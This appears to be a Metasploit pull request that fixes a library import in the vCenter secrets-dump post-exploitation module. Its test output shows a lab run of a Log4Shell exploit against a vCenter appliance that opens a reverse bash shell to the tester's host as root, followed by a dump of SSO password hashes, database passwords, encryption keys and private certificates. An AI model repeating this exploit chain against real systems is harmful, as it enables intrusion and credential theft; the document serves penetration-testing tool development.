### PR TITLE
Update identify hash library and call

### DIFF
--- a/modules/post/linux/gather/vcenter_secrets_dump.rb
+++ b/modules/post/linux/gather/vcenter_secrets_dump.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'metasploit/framework/credential_collection'
-require 'metasploit/framework/hashes/identify'
+require 'metasploit/framework/hashes'
 
 class MetasploitModule < Msf::Post
   include Msf::Post::Common
@@ -348,7 +348,7 @@ class MetasploitModule < Msf::Post
         username: dn,
         private_data: john_hash,
         private_type: :nonreplayable_hash,
-        jtr_format: identify_hash(john_hash)
+        jtr_format: Metasploit::Framework::Hashes.identify_hash(john_hash)
       ))
     end
   end


### PR DESCRIPTION
`post/linux/gather/vcenter_secrets_dump` fails to load properly.  After digging, I noticed that a library fails to load properly:
```
[11/01/2022 09:15:43] [e(0)] core: /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/vcenter_secrets_dump.rb failed to load - LoadError cannot load such file -- metasploit/framework/hashes/identify
```
I struggled to find out why this did not fail on 40fca92b3899ebbdeaf3c8e021a3f3b7c39f6b97, but failed on the resulting land 78a4c80e332718b17e8fc22dde286c46672c7089, since the library was not present in either.

I gave up trying to figure out why it worked without the library in 40fca92b3899ebbdeaf3c8e021a3f3b7c39f6b97, and just made it work in master by changing the imported library and the call.  If this is the correct fix, we need to update the documentation here: https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html as it says you need to `require 'metasploit/framework/hashes/identify'`  We should probably also fix the specs, too.  Again..... I don't know why the specs did not get very upset about all this?

<details>
<summary>Before</summary>

```
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > use post/linux/gather/vcenter_secrets_dump
[-] No results from search
[-] Failed to load module: post/linux/gather/vcenter_secrets_dump

```

</details>

<details>
<summary>After</summary>

```
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > use exploit/multi/http/vmware_vcenter_log4shell
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/vmware_vcenter_log4shell) > set target 2
target => 2
msf6 exploit(multi/http/vmware_vcenter_log4shell) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/vmware_vcenter_log4shell) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(multi/http/vmware_vcenter_log4shell) > set rhost 10.5.132.114
rhost => 10.5.132.114
msf6 exploit(multi/http/vmware_vcenter_log4shell) > set srvhost 10.5.135.201
srvhost => 10.5.135.201
msf6 exploit(multi/http/vmware_vcenter_log4shell) > set srvport 3389
srvport => 3389
msf6 exploit(multi/http/vmware_vcenter_log4shell) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[+] 10.5.132.114:443      - Log4Shell found via /websso/SAML2/SSO/vsphere.local?SAMLRequest= (header: X-Forwarded-For) (os: Linux 4.4.228-1.ph1 unknown, architecture: amd64-64) (java: Oracle Corporation_1.8.0_251)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.5.135.201:4444 -> 10.5.132.114:34216) at 2022-11-01 17:30:38 -0500
id
[*] Server stopped.

uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N]  y
msf6 exploit(multi/http/vmware_vcenter_log4shell) > use post/linux/gather/vcenter_secrets_dump 
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > set verbose true
verbose => true
msf6 post(linux/gather/vcenter_secrets_dump) > run

[*] VMware VirtualCenter 6.7.0 build-17028632
[*] vCenter Appliance (Embedded)
[*] Validating target ...
[*] Enumerating universal vSphere binaries ...
[+] 	ldapsearch: /opt/likewise/bin/ldapsearch
[*] Appliance IPv4: 10.5.132.114
[*] Appliance Hostname: photon-machine.moose
[*] Appliance OS: VMware Photon Linux 1.0-62c543d
[*] Gathering vSphere SSO domain information ...
[*] vSphere Machine ID: be5822f7-2722-446b-b374-9c48a1923c76
[*] vSphere SSO Domain FQDN: vsphere.local
[*] vSphere SSO Domain DN: dc=vsphere,dc=local
[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
[+] vSphere SSO DC DN: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: lUdBq\\EY;B+c"{e5So-r
[*] Extracting tenant and vpx AES encryption key...
[*] vCenter returned a Base64 AES key: LDQ3U1V/XD0rZmg8OUM/bQ==
[+] vSphere Tenant AES encryption
[+] 	KEY: ,47SU\=+fh<9C?m
[+] 	HEX: 2c343753557f5c3d2b66683c39433f6d
[+] vSphere vmware-vpx AES encryption
[+] 	HEX: 904bc531eeb4e3846c6738213e2ad671aaa8c12f6ab35a75a130a6fd8b992e23
[*] Extracting PostgreSQL database credentials ...
[+] 	VCDB Name: VCDB
[+] 	VCDB User: vc
[+] 	VCDB Pass: *Kk5!=FY3pCn)uB9
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF and storing to loot...
[+] LDIF Dump: /home/tmoose/.msf4/loot/20221101173137_default_10.5.132.114_vmdir_030917.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$909ac122bb4f53952c2d815f63c784f17f5604bbde1dd9241264614f10d3f8c55fa189e78286607ad124feea8d9655c773d81ec6330e750f8535d7bc3b6caae9$HEX$4055d19b919c6c8a6bc96865a8416827
[!] No active DB -- Credential data will not be saved!
[+] vSphere SSO User Credential: CN=waiter 404763bc-2aaf-432d-bcc1-1134b3426dc7,cn=users,dc=vsphere,dc=local:$dynamic_82$f79b19ebf8adde8717cc637a5657691ec56c2e06d582ba1004bbe4e54bfab0741a623047aaeb9490bb5c8867e2a742a5a39705212d12142357665d35848830c7$HEX$d20b641916b4779432fb6573343e9b6e
[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$e240b2eb552b9f9a7c3f8ebb30a3b68533096ab9addb2b189b2eb3fc1435723ac20cc8998d085679cd6397c93d709d76e1ade2ab58e119932c8104857221609b$HEX$601a57286c99e0846385282f7afd4be2
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$03094aaabcba803d1c4e2694c24065808bee59f3db0e23e43475b95e4d6ed0068d5de48f7502ef827ed4663609f4397ca89d256659908f4f4ddf6a7d9128e609$HEX$24e4fa79a0b65fbd768e95f29e3c3f93
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$055e73b99895cf7ef6560d556eaae7ce537cefcaa73c72d0d2a4564e08610565614d3ad407c8dd940cc0152c4582f3f53a24d1a9744686edf1966ea89e37379f$HEX$476cec1c760a1eab86bb00fc11da2ebf
[+] vSphere SSO User Credential: cn=vmca/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$44541ee284d439c65840ae08f684fcda6afa5c9f23e2964a933c6ffa540378a55ce162578a9116b2ee675e6b06db788c69c237f267314e6acfa03553df6774eb$HEX$fdd1d5f311ca1909cbd59d62c08318da
[+] vSphere SSO User Credential: cn=ldap/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$81953e69205ce32ff5ae83ee3113849a3ff8773ef437f4dd9152915f414fde037637f95b529866abd0c87ca373963234a747ac46881f29c9a99ac479759a0c4d$HEX$769f7212f651731e667767350c39c90e
[+] vSphere SSO User Credential: cn=DNS/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$58cceb892e40e02473f9be913034f86ed0f2f13d2d43fa2895afd0208a9c4e17d32506ce7cbcd03904cfa411a5e02e51e12a8c661526943f97bc1eefba0bcb14$HEX$4712e9c49dee731aa49dbd3c9f3f454f
[+] vSphere SSO User Credential: cn=host/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$69cb7dd55b1e1e2de1a0881911ad0c0e10f3e7edb545dafcc3fc76d1fb8112c5e749a4346892675bd076976c94076bf6f4fee0cb7beb122d77eea69e2599ad0b$HEX$895786442af879d243b9e72a5e68e8f2
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] 	  SSOUSER: photon-machine.moose@vsphere.local
[+] 	  SSOPASS: m.pB:fo|\Dj2%CGcUL3[
[+] 	SSODOMAIN: vsphere.local
[*] Extracting certificates from vSphere platform ...
[*] Extract VMCA_ROOT key ...
[+] VMCA_ROOT key: /home/tmoose/.msf4/loot/20221101173137_default_10.5.132.114_vmca_077039.key
[*] Extract VMCA_ROOT cert ...
[+] VMCA_ROOT cert: /home/tmoose/.msf4/loot/20221101173138_default_10.5.132.114_vmca_520025.pem
[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
[*] Parsing vmwSTSTenantCredential certificates and keys ...
[*] Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...
[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
[+] SSO_STS_IDP key: /home/tmoose/.msf4/loot/20221101173138_default_10.5.132.114_idp_804297.key
[+] SSO_STS_IDP cert: /home/tmoose/.msf4/loot/20221101173138_default_10.5.132.114_idp_039221.pem
[*] Extract MACHINE_SSL_CERT key ...
[+] MACHINE_SSL_CERT Key: /home/tmoose/.msf4/loot/20221101173138_default_10.5.132.114___MACHINE_CERT_577188.key
[*] Extract MACHINE_SSL_CERT certificate ...
[+] MACHINE_SSL_CERT Cert: /home/tmoose/.msf4/loot/20221101173138_default_10.5.132.114___MACHINE_CERT_166941.pem
[*] Extract MACHINE key ...
[+] MACHINE Key: /home/tmoose/.msf4/loot/20221101173139_default_10.5.132.114_machine_885351.key
[*] Extract MACHINE certificate ...
[+] MACHINE Cert: /home/tmoose/.msf4/loot/20221101173139_default_10.5.132.114_machine_526397.pem
[*] Extract VSPHERE-WEBCLIENT key ...
[+] VSPHERE-WEBCLIENT Key: /home/tmoose/.msf4/loot/20221101173139_default_10.5.132.114_vspherewebclien_053302.key
[*] Extract VSPHERE-WEBCLIENT certificate ...
[+] VSPHERE-WEBCLIENT Cert: /home/tmoose/.msf4/loot/20221101173139_default_10.5.132.114_vspherewebclien_774158.pem
[*] Extract VPXD key ...
[+] VPXD Key: /home/tmoose/.msf4/loot/20221101173140_default_10.5.132.114_vpxd_411223.key
[*] Extract VPXD certificate ...
[+] VPXD Cert: /home/tmoose/.msf4/loot/20221101173140_default_10.5.132.114_vpxd_239254.pem
[*] Extract VPXD-EXTENSION key ...
[+] VPXD-EXTENSION Key: /home/tmoose/.msf4/loot/20221101173140_default_10.5.132.114_vpxdextension_260639.key
[*] Extract VPXD-EXTENSION certificate ...
[+] VPXD-EXTENSION Cert: /home/tmoose/.msf4/loot/20221101173140_default_10.5.132.114_vpxdextension_082185.pem
[*] Extract DATA-ENCIPHERMENT key ...
[+] DATA-ENCIPHERMENT Key: /home/tmoose/.msf4/loot/20221101173141_default_10.5.132.114_dataenciphermen_048150.key
[*] Extract DATA-ENCIPHERMENT certificate ...
[+] DATA-ENCIPHERMENT Cert: /home/tmoose/.msf4/loot/20221101173141_default_10.5.132.114_dataenciphermen_220696.pem
[*] Extract SMS key ...
[+] SMS Key: /home/tmoose/.msf4/loot/20221101173141_default_10.5.132.114_sms_self_signed_967769.key
[*] Extract SMS certificate ...
[+] SMS Cert: /home/tmoose/.msf4/loot/20221101173141_default_10.5.132.114_sms_self_signed_135298.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed
```

</details>